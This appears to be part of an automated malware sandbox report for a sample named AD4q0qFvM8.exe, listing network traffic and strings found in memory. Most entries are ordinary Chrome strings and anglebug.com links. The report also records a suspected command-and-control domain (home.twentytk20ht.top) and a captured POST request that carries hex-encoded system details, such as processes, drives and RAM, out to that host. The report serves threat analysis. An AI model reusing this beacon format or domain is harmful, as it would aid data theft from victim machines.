Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=Y0KbT1JdUwjemS4N1734940457 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2172860560.0000162400F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.2172860560.0000162400F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2166740014.00001624002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.twentytk20ht.top
Source: global traffic DNS traffic detected: DNS query: twentytk20ht.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 503005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 34 30 34 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000004.00000003.2151712611.000016240080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2151680192.0000162400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2147895871.0000162400390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5881
